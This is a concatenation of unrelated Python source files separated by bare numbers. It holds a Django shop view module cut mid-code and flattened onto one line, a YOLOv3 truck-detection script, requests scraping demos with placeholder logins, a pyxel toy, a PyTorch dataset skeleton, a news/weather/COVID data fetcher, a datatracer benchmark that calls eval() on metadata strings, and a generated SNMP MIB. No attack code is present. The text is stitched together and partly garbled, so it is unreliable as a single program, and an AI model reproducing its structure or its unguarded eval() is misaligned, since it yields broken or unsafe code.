super().get_context_data(**kwargs) product = super().get_object() serialized_product = serializers.ProductSerializer(instance=product) context['vue_product'] = serialized_product.data return context class SearchView(ListView): """Main page for displaying product searches""" model = models.Product template_name = 'pages/search.html' context_object_name = 'products' paginate_by = 10 def get_queryset(self, **kwargs): searched_item = self.request.GET.get('q') if searched_item is None: return [] return self.model.product_manager.search_product(searched_item) def get_context_data(self, **kwargs): products = self.get_queryset(**kwargs) context = super().get_context_data(**kwargs) klass = super().get_paginator(self.get_queryset(**kwargs), self.paginate_by) serialized_products = serializers.ProductSerializer(instance=klass.object_list, many=True) context['vue_products'] = serialized_products.data # TODO collections = ['tops', 'pantalons'] random_collection = random.choice(collections) collection = models.Collection.objects.get(view_name=random_collection) proposed_products = collection.product_set.all()[:4] context['proposed_products'] = proposed_products return context @method_decorator(cache_page(60 * 60), name='dispatch') class SizeGuideView(TemplateView): """View for providing the customer with information on sizes etc.""" template_name = 'pages/size_guide.html' @require_POST @transaction.atomic def add_like(request, **kwargs): data = {'state': False} product = get_object_or_404(models.Product, id=kwargs['pk']) if request.user.is_authenticated: likes = product.like_set.filter(user=request.user) if likes.exists(): return JsonResponse(data=data) product.like_set.create(user=request.user) else: redirect_url = f"{reverse('accounts:login')}?next={product.get_absolute_url()}" data.update({'redirect_url': redirect_url}) return JsonResponse(data=data) @require_POST def size_calculator(request, **kwargs): """Calcultes from customer's measurements the correct size for him/her""" 
# data = json.loads(request.body) # bust = data['bust'] # chest = data['chest'] bust = request.POST.get('bust') chest = request.POST.get('chest') if bust is None and chest is None: return JsonResponse(data={'state': False}) bust = int(bust) chest = int(chest) calculator = sizes.BraCalculator(bust, chest) data = { 'state': True, 'result': calculator.get_full_bra_size, 'size': calculator.size, 'cup': calculator.cup } return JsonResponse(data=data) @require_POST @transaction.atomic def add_review(request, **kwargs): data = { 'state': False, 'message': "L'avis n'a pas pu être créé" } score = request.POST.get('score') text = request.POST.get('text') if request.user.is_authenticated: product = get_object_or_404(models.Product, id=kwargs.get('pk')) review = product.review_set.create( user=request.user, text=text, rating=score ) data.update({ 'state': True, 'message': "Votre avis a été créé" }) return JsonResponse(data=data)
13,266
3,736
"""Application entry point.""" from webapp import init_app app = init_app() # Using a development configuration app.config.from_object('config.DevConfig') # print(app.config) if __name__ == "__main__": app.run(host="0.0.0.0", debug=False)
245
84
import numpy as np
import cv2 as cv
import time
import os
import sys
import multiprocessing


def init(labelfile, config, weights):
    """Load class labels, per-class colors, and the pretrained YOLOv3 net.

    Returns (labels, colors, net, layer_names), where layer_names are the
    unconnected output layers used for inference.
    """
    # Get the labels
    labels = open(labelfile).read().strip().split('\n')
    # Initializing colors to represent each label uniquely
    colors = np.random.randint(0, 255, size=(len(labels), 3), dtype='uint8')
    # Load the weights and configuration to form the pretrained YOLOv3 model
    net = cv.dnn.readNetFromDarknet(config, weights)
    # Get the output layer names of the model.
    # NOTE(review): indexing i[0] assumes the pre-4.5.4 OpenCV API where
    # getUnconnectedOutLayers() returns Nx1 arrays; newer OpenCV returns a
    # flat array -- confirm the installed version.
    layer_names = net.getLayerNames()
    layer_names = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]
    return labels, colors, net, layer_names


def parse_input_path(input_path):
    """Return the image/video file names found directly in input_path.

    Only .png/.jpg/.jpeg images and .mp4/.avi videos are returned.
    Fix: the old check matched bare substrings ('jpeg' in path, '.png' in
    path, ...), so names like 'jpegnotes.txt' or 'a.png.bak' slipped
    through; match real extensions instead.
    """
    allowed = ('.png', '.jpg', '.jpeg', '.mp4', '.avi')
    return [path for path in os.listdir(input_path)
            if path.lower().endswith(allowed)]


def start_yolo_process(args):
    """Fan the files in args.input_path out to one yolo_process per file.

    Work is batched by CPU count; `tag` keeps each input file from being
    scheduled twice.
    """
    fileslist = parse_input_path(args.input_path)
    processes = []
    tag = []  # input paths already scheduled (dedup guard)
    # Parse through Input Data Folder.
    # NOTE(review): the for+while combination revisits files; the `tag`
    # dedup keeps it correct, but the loop structure looks accidental --
    # confirm before simplifying.
    for idx, file in enumerate(fileslist):
        pid = 0
        while ((pid < multiprocessing.cpu_count()) and (idx < len(fileslist))):
            if ((idx + pid) < len(fileslist)):
                # Create Processes
                try:
                    tFile = fileslist[idx + pid]
                    in_path = str(args.input_path + tFile)
                    processed_path = str(args.processed_folder + tFile)
                    arguments = (tFile, in_path, processed_path,
                                 tFile[:tFile.find('.')], args.labels,
                                 args.config, args.weights, args.output_path,
                                 args.delay_time, args.save_video, args.option,
                                 args.video_output_path, args.confidence,
                                 args.threshold, pid, False, None)
                    process = multiprocessing.Process(target=yolo_process,
                                                      args=arguments)
                    if in_path not in tag:
                        processes.append(process)
                        tag.append(in_path)
                except Exception as err:
                    print("[ERROR] {e}".format(e=err))
            pid += 1
        # Execute the batch, wait for it, then clear for the next batch.
        for process in processes:
            try:
                process.start()
            except Exception as err:
                print("[ERROR] {e}".format(e=err))
        for process in processes:
            try:
                process.join()
            except Exception as err:
                print("[ERROR] {e}".format(e=err))
        processes.clear()


def yolo_process(file, file_path, done_path, output_name, labels, config,
                 weights, save_path, delay_time, save_video, option,
                 video_output_path, confidence, threshold, process_id,
                 gui, gui_obj):
    """Run YOLO inference on one image or video file (or the webcam).

    Images are labeled and saved. Videos are scanned frame by frame and
    frames matching the freight-truck heuristic are saved according to
    `option` (0 raw, 1 labeled, 2 both, 3 two-frame collage). Processed
    inputs are renamed to done_path.
    """
    image_path = None
    video_path = None
    if ('.png' in file_path) or ('.jpg' in file_path) or ('.jpeg' in file_path):
        image_path = file_path
    if ('.mp4' in file_path) or ('.avi' in file_path):
        video_path = file_path

    # Initialize labels, colors, and pretrained model
    try:
        labels, colors, net, layer_names = init(labels, config, weights)
    except Exception as err:
        print("[ERROR] {e}".format(e=err))

    # If neither an image nor a video file is given then fall back to webcam
    if image_path is None and video_path is None:
        print('[WARNING] Neither path to an image or path to video provided. Starting Inference on Webcam...')

    # Do inference with given image
    if image_path:
        print('[INFO] Starting image processing of {ip}...'.format(ip=str(image_path)))
        if not os.path.exists(image_path):
            print("[ERROR] Image path does not exist. Exiting...")
            sys.exit()
        # Read the image
        try:
            img = cv.imread(image_path)
            height, width = img.shape[:2]
        except:
            raise Exception('[ERROR] Image cannot be loaded!\n'
                            'Please check the path provided!')
        else:
            # Fix: this ran in a `finally` block before, so a failed load
            # still attempted inference on an undefined image and masked
            # the real error; `else` only runs on a successful load.
            img, _, _, _, _, _, _, _, _ = infer_image(net, layer_names, height,
                                                      width, img, colors, labels,
                                                      confidence, threshold)
            save_image(img, output_name, save_path)
            os.rename(file_path, done_path)
    elif video_path:
        print('[INFO] Starting video processing of {vp}...'.format(vp=str(video_path)))
        if output_name is None:
            print("[ERROR] No output name specified. Exiting...")
            sys.exit()
        if not os.path.exists(video_path):
            print("[ERROR] Video path does not exist. Exiting...")
            sys.exit()
        # Read the video
        try:
            vid = cv.VideoCapture(video_path)
            boxHeight, boxWidth = 0, 0
            height, width = None, None
            writer = None
        except:
            raise Exception('[ERROR] Video cannot be loaded!\n'
                            'Please check the path provided!')
        else:
            # Fix: moved out of `finally` (see the image branch above).
            timings = np.array([])
            # Will attempt to count the number of frames in the video,
            # This is dependent on the OpenCV version
            try:
                total = int(vid.get(cv.CAP_PROP_FRAME_COUNT))
            except:
                try:
                    total = int(vid.get(cv.CV_CAP_PROP_FRAME_COUNT))
                except:
                    print("[WARNING] Have to count frames manually. This might take a while...")
                    total = count_frames_manual(vid)
                    print("[SUCCESS] Count complete...")
            delay = delay_time
            num_images = 0
            # Scan each frame in video
            while True:
                grabbed, raw_frame = vid.read()
                try:
                    labeled_frame = raw_frame.copy()
                except:
                    labeled_frame = None
                # Checking if the complete video is read
                if not grabbed:
                    break
                if width is None or height is None:
                    height, width = labeled_frame.shape[:2]
                if writer is None and save_video is True:
                    # Initialize the video writer on the first frame
                    fourcc = cv.VideoWriter_fourcc(*"MJPG")
                    writer = cv.VideoWriter(video_output_path, fourcc, 30,
                                            (labeled_frame.shape[1], labeled_frame.shape[0]), True)
                # Time frame inference and show progress
                start = time.time()
                if delay <= 0 and labeled_frame is not None:
                    labeled_frame, _, _, classids, _, xPos, yPos, boxWidth, boxHeight = \
                        infer_image(net, layer_names, height, width, labeled_frame,
                                    colors, labels, confidence, threshold)
                    try:
                        obj = labels[classids[0]]
                    except:
                        obj = None
                    # Descriptions of a typical freight truck: wide box that
                    # fills most of the frame.
                    if (((obj == 'truck') and (boxWidth >= (boxHeight * 1.5)) and
                         (boxHeight >= 0.4 * height) and (boxWidth >= 0.7 * width))):
                        # Extract timestamp (ms) from the video to tag the frame
                        try:
                            modified_name = output_name + ('_{time}'.format(
                                time=str(int(vid.get(cv.CAP_PROP_POS_MSEC)))))
                        except:
                            modified_name = output_name + '_?'
                        # report_image_attributes(modified_name, xPos, boxWidth, boxHeight, width, height)
                        if (option == 0) or (option == 2):
                            # Save raw image
                            save_image(raw_frame, modified_name, save_path, True)
                            num_images += 1
                        if (option == 1) or (option == 2):
                            # Save labeled image
                            save_image(labeled_frame, modified_name, save_path, False)
                            num_images += 1
                        if (option == 3):
                            # Save a vertical collage of this frame plus the
                            # frame 10 reads later.
                            try:
                                collage_name = str(modified_name + "_collage.png")
                                primary = raw_frame
                                # Capture secondary frame (10 frames over)
                                for i in range(10):
                                    _, secondary = vid.read()
                                save_image(np.vstack([primary, secondary]), collage_name, save_path, True)
                                num_images += 1
                            except Exception as err:
                                print("[ERROR] {e}".format(e=err))
                        # Restart the save cool-down after a detection.
                        # NOTE(review): placement reconstructed from flattened
                        # source -- confirm against the original file.
                        delay = delay_time
                delay -= 1
                if save_video is True:
                    writer.write(labeled_frame)
                end = time.time()
                timings = np.append(timings, (end - start))
                show_progress_bar(timings.size, total, num_images,
                                  np.average(timings), output_name, process_id)
                # Mirror progress into the GUI progress bar when present
                if gui is True:
                    gui_obj.bar['value'] = (timings.size / total) * 100
                    gui_obj.bar.update_idletasks()
            # End process
            print("\n[INFO] Cleaning up...")
            if writer is not None:
                writer.release()
            vid.release()
            os.rename(file_path, done_path)
    else:
        # Infer real-time on webcam: run the full network only every sixth
        # frame and redraw the cached boxes in between.
        count = 0
        vid = cv.VideoCapture(0)
        while True:
            _, frame = vid.read()
            height, width = frame.shape[:2]
            if count == 0:
                frame, boxes, confidences, classids, index, _, _, _, _ = \
                    infer_image(net, layer_names, height, width, frame,
                                colors, labels, confidence, threshold)
                count += 1
            else:
                frame, boxes, confidences, classids, index, _, _, _, _ = \
                    infer_image(net, layer_names, height, width, frame,
                                colors, labels, confidence, threshold,
                                boxes, confidences, classids, index, infer=False)
                count = (count + 1) % 6
            cv.imshow('webcam', frame)
            if cv.waitKey(1) & 0xFF == ord('q'):
                break
        vid.release()
        cv.destroyAllWindows()
    print("[SUCCESS] Image Processing Complete...")


def report_image_attributes(modified_name, xPos, boxWidth, boxHeight, width, height):
    """Print debugging attributes for one saved detection frame."""
    print("Name: {n}".format(n=modified_name))
    print("X Position: {x}".format(x=xPos))
    print("BoxWidth: {bw}".format(bw=boxWidth))
    print("BoxHeight: {bh}".format(bh=boxHeight))
    print("Image Width: {iw}".format(iw=width))
    print("Image Height: {ih}\n\n".format(ih=height))


def save_image(img, output_name, save_path, raw=False):
    """Write img under save_path with a unique numbered file name.

    Fix: `raw` now defaults to False -- the image branch of yolo_process
    calls save_image() with three arguments, which previously raised a
    TypeError. Existing four-argument callers are unaffected.
    """
    num = 1
    while True:
        if raw is True:
            filename = '{s}{o}_{n}_raw.png'.format(s=save_path, o=output_name, n=num)
        else:
            filename = '{s}{o}_{n}_labeled.png'.format(s=save_path, o=output_name, n=num)
        if os.path.isfile(filename):
            num += 1
        else:
            cv.imwrite(filename, img)
            break


def draw_labels_and_boxes(img, boxes, confidences, classids, idxs, colors, labels):
    """Draw the NMS-surviving boxes and labels on img.

    Returns (img, x, y, w, h) -- x/y/w/h describe the last box drawn
    (zeros when there are no detections).
    """
    # If there are any detections
    x, y, w, h = 0, 0, 0, 0
    if len(idxs) > 0:
        for i in idxs.flatten():
            # Get the bounding box coordinates
            x, y = boxes[i][0], boxes[i][1]
            w, h = boxes[i][2], boxes[i][3]
            # Get the unique color for this class
            color = [int(c) for c in colors[classids[i]]]
            # Draw the bounding box rectangle and label on the image
            cv.rectangle(img, (x, y), (x + w, y + h), color, 2)
            text = "{}: {:4f}".format(labels[classids[i]], confidences[i])
            cv.putText(img, text, (x, y - 5), cv.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
    return img, x, y, w, h


def generate_boxes_confidences_classids(outs, height, width, tconf):
    """Convert raw YOLO layer outputs into pixel-space boxes.

    Each detection row is [cx, cy, w, h, objectness, score0, score1, ...]
    with coordinates normalized to [0, 1]; only detections whose best class
    score exceeds tconf are kept.
    """
    boxes = []
    confidences = []
    classids = []
    for out in outs:
        for detection in out:
            # Get the scores, class ID, and the confidence of the prediction
            scores = detection[5:]
            classid = np.argmax(scores)
            confidence = scores[classid]
            # Consider only the predictions that are above a certain confidence level
            if confidence > tconf:
                box = detection[0:4] * np.array([width, height, width, height])
                centerX, centerY, bwidth, bheight = box.astype('int')
                # Using the center x, y coordinates to derive the top
                # and the left corner of the bounding box
                x = int(centerX - (bwidth / 2))
                y = int(centerY - (bheight / 2))
                # Append to list
                boxes.append([x, y, int(bwidth), int(bheight)])
                confidences.append(float(confidence))
                classids.append(classid)
    return boxes, confidences, classids


def infer_image(net, layer_names, height, width, img, colors, labels, confidence,
                threshold, boxes=None, confidences=None, classids=None, idxs=None,
                infer=True):
    """Run one forward pass (or redraw cached detections when infer=False).

    Returns (img, boxes, confidences, classids, idxs, x, y, w, h).
    """
    if infer:
        # Constructing a blob from the input image
        blob = cv.dnn.blobFromImage(img, 1 / 255.0, (416, 416), swapRB=True, crop=False)
        # Perform a forward pass of the YOLO object detector
        net.setInput(blob)
        # Getting the outputs from the output layers
        outs = net.forward(layer_names)
        # Generate the boxes, confidences, and classIDs
        boxes, confidences, classids = generate_boxes_confidences_classids(outs, height, width, confidence)
        # Apply Non-Maxima Suppression to suppress overlapping bounding boxes
        idxs = cv.dnn.NMSBoxes(boxes, confidences, confidence, threshold)
    if boxes is None or confidences is None or idxs is None or classids is None:
        raise Exception('[ERROR] Required variables are set to None before drawing boxes on images.')
    # Draw labels and boxes on the image
    img, x, y, w, h = draw_labels_and_boxes(img, boxes, confidences, classids, idxs, colors, labels)
    return img, boxes, confidences, classids, idxs, x, y, w, h


def show_progress_bar(count, total, num_images, diff, name, pid, status=''):
    """Print a text progress bar with ETA and saved-image count."""
    bar_length = 40
    filled_length = int(round(bar_length * count / float(total)))
    percentage = round(100.0 * count / float(total), 1)
    bar = '=' * filled_length + '-' * (bar_length - filled_length)
    # diff is the average per-frame time; multiply by remaining frames for ETA.
    sec_left = diff * (total - count)
    sys.stdout.write("%s[%s] %s%s (%s) %s ...%s\r\n" %
                     ('{p}:'.format(p=name), str(bar), str(percentage), '%',
                      time.strftime('%Hh, %Mm, %Ss', time.gmtime(sec_left)),
                      '[{i}]'.format(i=num_images), status))
    # sys.stdout.flush()


def count_frames_manual(video):
    """Count frames by reading the capture to exhaustion (releases it)."""
    total = 0
    while True:
        grabbed, frame = video.read()
        if not grabbed:
            break
        total += 1
    video.release()
    return total
19,169
4,799
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
import requests


def simple_post_test():
    """POST a simple form and print the server's response body."""
    form = {'firstname': 'Ryan', 'lastname': 'Mitchell'}
    resp = requests.post("http://pythonscraping.com/files/processing.php", data=form)
    print(resp.text)


def cookie_test():
    """Log in, show the cookies the server set, then reuse them manually."""
    creds = {'username': 'Ryan', 'password': 'password'}
    resp = requests.post("http://pythonscraping.com/pages/cookies/welcome.php", creds)
    print("Cookie is set to:")
    print(resp.cookies.get_dict())
    print("------------------")
    print("Going to profile page...")
    resp = requests.get("http://pythonscraping.com/pages/cookies/profile.php",
                        cookies=resp.cookies)
    print(resp.text)


def session_test():
    """Log in through a Session object so cookies persist automatically."""
    session = requests.Session()
    creds = {'username': 'username', 'password': 'password'}
    resp = session.post("http://pythonscraping.com/pages/cookies/welcome.php", creds)
    print("Cookie is set to:")
    print(resp.cookies.get_dict())
    print("-----------------")
    print("Going to profile page...")
    resp = session.get("http://pythonscraping.com/pages/cookies/profile.php")
    print(resp.text)


def auth_test():
    """Authenticate with HTTP Basic auth and print the response."""
    from requests.auth import AuthBase
    from requests.auth import HTTPBasicAuth
    basic = HTTPBasicAuth('ryan', 'password')
    resp = requests.post(url="http://pythonscraping.com/pages/auth/login.php", auth=basic)
    print(resp.text)


if __name__ == '__main__':
    auth_test()
1,386
476
# NOTE(review): this turtle import is unused and the name is shadowed by the
# local `width` in __init__ -- confirm and remove.
from turtle import width
import pyxel
from random import randint


class App:
    """Pyxel demo: a circle that grows each frame and, after wrapping,
    jumps to a random position with a new color."""

    def __init__(self):
        # Window size in pixels.
        width, height = 720, 1280
        pyxel.init(width, height)
        self.raio = 10          # circle radius (grows every frame)
        self.color = 1          # palette color index
        self.position_x = int(width/2)
        self.position_y = int(height/2)
        # Hand control to pyxel's game loop (blocks until quit).
        pyxel.run(self.update, self.draw)

    def update(self):
        # Q quits the application.
        if pyxel.btnp(pyxel.KEY_Q):
            pyxel.quit()
        # Grow the radius, wrapping at the screen width.
        self.raio = (self.raio + 10) % pyxel.width
        if self.raio <= 10:
            # Wrapped around: relocate the circle and advance the color.
            self.position_x = randint(200,500)
            self.position_y = randint(200,1000)
            self.color = (self.color + 1) % 15

    def draw(self):
        # Clear the screen, then draw the circle outline.
        pyxel.cls(0)
        pyxel.circb(self.position_x, self.position_y, self.raio, self.color)


App()
775
305
from torch.utils.data import DataLoader, Dataset

__build__ = 2018
__author__ = "singsam_jam@126.com"


def get_loader(args, kwargs):
    """Build and return (train_loader, test_loader) over ModelDataset.

    Fixes: DataLoader was handed the ModelDataset *class* instead of an
    instance, which fails as soon as the loader needs __len__/__getitem__.
    The train loader also always reused args.test_batch_size; it now
    prefers args.batch_size when the args object provides one, falling
    back to the old behavior otherwise (backward compatible).
    """
    train_bs = getattr(args, 'batch_size', args.test_batch_size)
    train_loader = DataLoader(dataset=ModelDataset(),
                              batch_size=train_bs,
                              collate_fn=collate_fn,
                              shuffle=True,
                              **kwargs)
    test_loader = DataLoader(dataset=ModelDataset(),
                             batch_size=args.test_batch_size,
                             collate_fn=collate_fn,
                             shuffle=False,
                             **kwargs)
    return train_loader, test_loader


class ModelDataset(Dataset):
    """Skeleton dataset: fill in __getitem__ and __len__ for real data."""

    def __init__(self):
        pass

    def __getitem__(self, index):
        # TODO: return the sample at `index`; placeholder returns None.
        item = None
        return item

    def __len__(self):
        # Must be implemented before the dataset can be used by a DataLoader.
        raise NotImplementedError


def collate_fn(batch=None):
    """Skeleton collate function.

    Fix: DataLoader invokes collate_fn with the list of samples in a batch,
    but the original took no parameters and would raise a TypeError when
    called; `batch` defaults to None so existing zero-argument callers
    still work.
    """
    pass
723
235
from uk_covid19 import Cov19API
import geocoder
import logging
import requests
import json

# NOTE: the `encoding` argument of basicConfig requires Python 3.9+.
logging.basicConfig(filename = "sys.log", encoding = 'utf-8')


def get_location():
    """Return the current city, resolved from this machine's IP address."""
    current_location_data = geocoder.ip('me')
    return current_location_data.city


def get_news() -> None:
    """Fetch GB top headlines from the News API and cache them in news.json."""
    base_url = "https://newsapi.org/v2/top-headlines?"
    with open('config.json', 'r') as config_file:
        temp = json.load(config_file)
    api_key = temp["keys"]["news_key"]
    country = "gb"
    complete_url = base_url + "country=" + country + "&apiKey=" + api_key
    response = requests.get(complete_url, timeout = 10)
    # Fix: the failure check was inverted (`<= 400` logged every successful
    # request as a failure); `>= 400` matches HTTP error semantics and the
    # check used in get_weather().
    if response.status_code >= 400:
        logging.info('News request failed')
    # Store news in file
    with open('news.json', 'w') as news_file:
        json.dump(response.json(), news_file)


def get_weather() -> None:
    """Fetch current weather for the local city and cache it in weather.json."""
    base_url = "http://api.openweathermap.org/data/2.5/weather?"
    with open('config.json', 'r') as config_file:
        temp = json.load(config_file)
    api_key = temp["keys"]["weather_key"]
    city_name = get_location()
    complete_url = base_url + "appid=" + api_key + "&q=" + city_name
    response = requests.get(complete_url, timeout = 10)
    if response.status_code >= 400:
        logging.info('Weather request failed')
    # Store weather data in file
    with open('weather.json', 'w') as weather_file:
        json.dump(response.json(), weather_file)


def get_covid() -> None:
    """Fetch local UK COVID case numbers and cache them in
    public_health_england.json."""
    city_name = get_location()
    # Filter the API to the caller's own area.
    local_only = [
        'areaName={}'.format(city_name)
    ]
    data = {
        "date": "date",
        "areaName": "areaName",
        "newCasesByPublishDate": "newCasesByPublishDate"
    }
    api = Cov19API(filters = local_only, structure = data)
    covid_data = api.get_json()
    # Store covid data in file
    with open('public_health_england.json', 'w') as covid_file:
        json.dump(covid_data, covid_file)
2,386
818
# -*- coding: utf-8 -*- """ Unit Test: orchard.system_status.formatters """
81
35
import time
# NOTE(review): this shadows the `time` module imported above; the calls
# below use `time()` (the timestamp function) -- confirm before cleaning up.
from time import time

import dask
import pandas as pd
from dask.diagnostics import ProgressBar

import datatracer


def transform_single_column(tables, column_info):
    """Materialize one lineage source column described by `column_info`.

    When an aggregation is given it is evaluated to a transformer callable;
    otherwise the raw source column is returned with NaNs filled with 0.0.
    """
    aggregation = column_info['aggregation']
    column_name = column_info['source_col']['col_name']
    fk = column_info['row_map']
    if aggregation:
        # SECURITY NOTE(review): eval() on metadata strings -- only safe for
        # trusted benchmark inputs.
        transformer = eval(aggregation)
        return transformer(tables, fk, column_name)
    else:
        return tables[column_info['source_col']['table_name']][column_name].fillna(0.0).values


def produce_target_column(tables, map_info):
    """Recompute the target column from its lineage description.

    Transforms every lineage column, then applies the combining
    transformation; returns None when no transformation is recorded.
    """
    transformation = map_info['transformation']
    if transformation:
        transformed_columns = []
        for col_info in map_info['lineage_columns']:
            transformed_columns.append(transform_single_column(tables, col_info))
        # SECURITY NOTE(review): eval() on metadata strings (see above).
        transformer = eval(transformation)
        return transformer(transformed_columns)
    else:
        return None


def approx_equal(num, target, add_margin, multi_margin):
    """True when num is within additive + multiplicative margins of target.

    The two branches keep the multiplicative bounds oriented correctly for
    negative targets.
    """
    if target >= 0:
        return (num <= target * (1 + multi_margin) + add_margin) and (num >= target * (1 - multi_margin) - add_margin)
    else:
        return (num <= target * (1 - multi_margin) + add_margin) and (num >= target * (1 + multi_margin) - add_margin)


def approx_equal_arrays(num, target, add_margin, multi_margin):
    """Element-wise approx_equal over two equal-length sequences."""
    for n, t in zip(num, target):
        if not approx_equal(n, t, add_margin, multi_margin):
            return False
    return True


@dask.delayed
def evaluate_single_lineage(constraint, tracer, tables):
    """Score one lineage constraint.

    Precision is 1 only when the solver recovers exactly the annotated
    source columns AND the reproduced target values match numerically.
    Solver crashes yield a zero-precision ERROR record.
    """
    field = constraint["fields_under_consideration"][0]
    related_fields = constraint["related_fields"]
    # Ground truth: set of (table, field) pairs annotated in the metadata.
    y_true = set()
    for related_field in related_fields:
        y_true.add((related_field["table"], related_field["field"]))
    try:
        start = time()
        ret_dict = tracer.solve(tables, target_table=field["table"], target_field=field["field"])
        y_pred = {(col['source_col']['table_name'], col['source_col']['col_name'])
                  for col in ret_dict['lineage_columns']}
        end = time()
    except BaseException:
        return {
            "table": field["table"],
            "field": field["field"],
            "precision": 0,
            "inference_time": 0,
            "status": "ERROR",
        }
    if len(y_pred) == len(y_true) and \
            len(y_true.intersection(y_pred)) == len(y_pred):
        # Column sets match exactly; also verify the recomputed values.
        predicted_target = produce_target_column(tables, ret_dict)
        target_column = tables[field["table"]][field["field"]].fillna(0.0).values
        if approx_equal_arrays(predicted_target, target_column, 1e-8, 1e-8):
            precision = 1
        else:
            precision = 0
    else:
        precision = 0
    return {
        "table": field["table"],
        "field": field["field"],
        "precision": precision,
        "inference_time": end - start,
        "status": "OK",
    }


@dask.delayed
def how_lineage(solver, target, datasets):
    """Benchmark the how lineage solver on the target dataset.

    Args:
        solver: The name of the how lineage pipeline.
        target: The name of the target dataset.
        datasets: A dictionary mapping dataset names to (metadata, tables) tuples.

    Returns:
        A list of dictionaries mapping metric names to values for each
        derived column.
    """
    # Leave-one-out: fit on every dataset except the target.
    datasets = datasets.copy()
    metadata, tables = datasets.pop(target)
    if not metadata.data.get("constraints"):
        return {}  # Skip dataset, no constraints found.
    tracer = datatracer.DataTracer(solver)
    tracer.fit(datasets)
    list_of_metrics = []
    for constraint in metadata.data["constraints"]:
        list_of_metrics.append(evaluate_single_lineage(constraint, tracer, tables))
    list_of_metrics = dask.compute(list_of_metrics)[0]
    return list_of_metrics


def benchmark_how_lineage(data_dir, dataset_name=None, solver="datatracer.how_lineage.basic"):
    """Benchmark the how lineage solver.

    This uses leave-one-out validation and evaluates the performance of the
    solver on the specified datasets.

    Args:
        data_dir: The directory containing the datasets.
        dataset_name: The target dataset to test on. If none is provided,
            will test on all available datasets by default.
        solver: The name of the column map pipeline.

    Returns:
        A DataFrame containing the benchmark results, or None when the
        requested dataset is not found.
    """
    datasets = datatracer.load_datasets(data_dir)
    dataset_names = list(datasets.keys())
    if dataset_name is not None:
        if dataset_name in dataset_names:
            dataset_names = [dataset_name]
        else:
            return None
    datasets = dask.delayed(datasets)
    dataset_to_metrics = {}
    for dataset_name in dataset_names:
        dataset_to_metrics[dataset_name] = how_lineage(
            solver=solver, target=dataset_name, datasets=datasets)
    rows = []
    with ProgressBar():
        results = dask.compute(dataset_to_metrics)[0]
    for dataset_name, list_of_metrics in results.items():
        for metrics in list_of_metrics:
            metrics["dataset"] = dataset_name
            rows.append(metrics)
    df = pd.DataFrame(rows)
    # Move the identifying columns to the front: dataset, table, field.
    dataset_col = df.pop('dataset')
    table_col = df.pop('table')
    field_col = df.pop('field')
    df.insert(0, 'field', field_col)
    df.insert(0, 'table', table_col)
    df.insert(0, 'dataset', dataset_col)
    return df
5,522
1,638
#
# PySNMP MIB module H323-TRAP-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/H323-TRAP-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 19:07:51 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
# NOTE: machine-generated by pysmi -- do not edit by hand; regenerate from
# the ASN.1 MIB source instead. `mibBuilder` is not imported here;
# presumably it is supplied by the pysnmp MIB loader when this module is
# executed -- confirm before running standalone.

# Managed-object symbols imported from companion MIB modules.
gwID, timeOccurred, reason, registrationStatus, comment, gwType, csID, port, percent, csType, gwIP, moduleID, code = mibBuilder.importSymbols("AGGREGATED-EXT-MIB", "gwID", "timeOccurred", "reason", "registrationStatus", "comment", "gwType", "csID", "port", "percent", "csType", "gwIP", "moduleID", "code")
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, ConstraintsIntersection, ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ConstraintsIntersection", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
TimeTicks, enterprises, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, ObjectName, Counter64, Unsigned32, snmpModules, ObjectIdentity, MibIdentifier, Gauge32, IpAddress, Counter32, NotificationType, ModuleIdentity, Bits, Integer32 = mibBuilder.importSymbols("SNMPv2-SMI", "TimeTicks", "enterprises", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ObjectName", "Counter64", "Unsigned32", "snmpModules", "ObjectIdentity", "MibIdentifier", "Gauge32", "IpAddress", "Counter32", "NotificationType", "ModuleIdentity", "Bits", "Integer32")
TestAndIncr, DisplayString, RowStatus, TruthValue, TimeStamp, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "TestAndIncr", "DisplayString", "RowStatus", "TruthValue", "TimeStamp", "TextualConvention")

# OID subtree: iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).lucent(1751)
lucent = MibIdentifier((1, 3, 6, 1, 4, 1, 1751))
products = MibIdentifier((1, 3, 6, 1, 4, 1, 1751, 1))
softSwitch = MibIdentifier((1, 3, 6, 1, 4, 1, 1751, 1, 1198))
h323DeviceServer = MibIdentifier((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3))
h323Traps = ModuleIdentity((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0))
if mibBuilder.loadTexts: h323Traps.setLastUpdated('240701')
if mibBuilder.loadTexts: h323Traps.setOrganization('Lucent Technologies')

# Notification (trap) definitions under h323Traps.
h323CSConnectionStatus = NotificationType((1, 3, 6, 1, 4, 1, 1751, 1, 1198, 3, 0, 0)).setObjects(("AGGREGATED-EXT-MIB", "timeOccurred"), ("AGGREGATED-EXT-MIB", "code"), ("AGGREGATED-EXT-MIB", "csID"), ("AGGREGATED-EXT-MIB", "csType"), ("AGGREGATED-EXT-MIB", "registrationStatus"), ("AGGREGATED-EXT-MIB", "reason"), ("AGGREGATED-EXT-MIB", "comment"))
if mibBuilder.loadTexts: h323CSConnectionStatus.setStatus('current')
